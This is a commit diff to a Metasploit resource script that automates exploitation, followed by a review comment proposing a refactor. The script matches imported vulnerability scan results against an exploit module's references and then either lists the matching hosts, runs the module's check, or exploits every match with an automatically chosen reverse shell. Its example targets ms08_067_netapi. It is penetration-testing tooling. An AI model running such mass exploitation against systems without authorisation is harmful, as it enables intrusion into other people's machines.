Rewrite how each mode is handled

unstable
sinn3r 2012-07-10 16:06:07 -05:00
parent b449c0e21c
commit ce107fbd6f
1 changed files with 49 additions and 29 deletions


@ -1,4 +1,3 @@
<ruby> <ruby>
# #
# Print the help function # Print the help function
@ -6,25 +5,27 @@
def help_me def help_me
help = %Q| help = %Q|
Description: Description:
This Metasploit RC file can be used to automate the exploitation process. Before This Metasploit RC file can be used to automate the exploitation process. Before using the
using this script, you should import your vulnerability results to Metasploit, and script, you must import your vulnerability results to Metasploit so that it can deploy the
then it will exploit each possible host when there is a match to one of the module based on matching references. Three modes are available: exploit/dry/and check.
references. A reverse shell is automatically selected for you, and will always In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
default to a suitable meterpreter. suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
function found in the module. If no mode is specified, then it'll default to 'exploit'.
Usage: Usage:
./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode] ./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
Arguments: Arguments:
rc_path - Full path to the RC script rc_path - Full path to the RC script
db_user - Username for MSF database (datastore: 'DB_USER') db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS') db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE') db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE') module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Dry-run mode [dry/check] (datastore: 'MODE') mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
Example: Example of running an exploit:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi dry msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
Authors: Authors:
sinn3r <sinn3r[at]metasploit.com> sinn3r <sinn3r[at]metasploit.com>
@ -114,7 +115,7 @@ end
# #
# Start the exploitation # Exploit mode
# #
def auto_exploit(module_path) def auto_exploit(module_path)
exploit = load_exploit(module_path) exploit = load_exploit(module_path)
@ -146,9 +147,9 @@ end
# #
# Find all mathing references # Dry-run mode
# #
def dry_run(module_path,mode) def dry_run(module_path)
exploit = load_exploit(module_path) exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil? raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
@ -157,15 +158,29 @@ def dry_run(module_path,mode)
framework.db.workspace.vulns.each do |vuln| framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs) next if not ref_has_match(vuln.refs, exploit_refs)
addr = vuln.host.address.to_s addr = vuln.host.address.to_s
print_good("#{addr} seems vulnerable to #{exploit.shortname}") print_good("#{addr} has a matching reference to #{exploit.shortname}")
if mode == "check" end
print_good("checking #{addr} with check mechanism of #{exploit.shortname}") end
run_single("use #{exploit.fullname}")
run_single("set RHOST #{addr}")
run_single("check") #
run_single("back") # Check mode
print_line("") #
end def check_exploit(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
exploit_refs = exploit.references
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{vuln.host.address.to_s}")
run_single("check")
select(nil, nil, nil, 1)
run_single("back")
print_line()
end end
end end
@ -198,7 +213,7 @@ def init_args
args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || '' args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || '' args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
args[:module] = ARGV.shift || datastore['MODULE'] || '' args[:module] = ARGV.shift || datastore['MODULE'] || ''
args[:mode] = (ARGV.shift || datastore['MODE'] || '') args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
raise ArgumentError, "Missing a module path" if args[:module].empty? raise ArgumentError, "Missing a module path" if args[:module].empty?
@ -223,10 +238,15 @@ begin
end end
end end
if (args[:mode] == "dry" or args[:mode] == "check") case args[:mode]
dry_run(args[:module], args[:mode]) when /^exploit$/i
else
auto_exploit(args[:module]) auto_exploit(args[:module])
when /^dry$/i
dry_run(args[:module])
when /^check$/i
check_exploit(args[:module])
else
raise ArgumentError, "Invalid mode"
end end
rescue ArgumentError => e rescue ArgumentError => e
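Review bot: check_exploit (the hunk at @ -157) duplicates the first four lines of dry_run — load_exploit, the nil check, exploit.references and the vulns loop with ref_has_match — so the two modes can drift apart; extracting that into a helper that yields each matching (exploit, vuln) pair keeps a single definition of what "matching" means. In the same body, `select(nil, nil, nil, 1)` is an obscure way to pause (presumably to let the check finish before `back`); `sleep(1)` says what is meant, and `vuln.host.address.to_s` is evaluated twice where a local `addr`, as dry_run already uses, would do. In the last hunk, `/^exploit$/i` and the two sibling patterns use line anchors, so a mode string containing a newline still matches; `/\Aexploit\z/i` (or `case args[:mode].downcase` with plain string `when`s) anchors the whole value, and `raise ArgumentError, "Invalid mode: #{args[:mode]}"` would tell the user which value was rejected.
```ruby
#
# Yield each (exploit, vuln) pair whose references match
#
def each_matching_vuln(module_path)
  exploit = load_exploit(module_path)
  raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
  exploit_refs = exploit.references
  framework.db.workspace.vulns.each do |vuln|
    next if not ref_has_match(vuln.refs, exploit_refs)
    yield exploit, vuln
  end
end

# … unchanged: dry_run, rewritten the same way on top of each_matching_vuln …

#
# Check mode
#
def check_exploit(module_path)
  each_matching_vuln(module_path) do |exploit, vuln|
    addr = vuln.host.address.to_s
    print_good("Checking #{exploit.shortname} against host #{addr}")
    run_single("use #{exploit.fullname}")
    run_single("set RHOST #{addr}")
    run_single("check")
    sleep(1)
    run_single("back")
    print_line()
  end
end
```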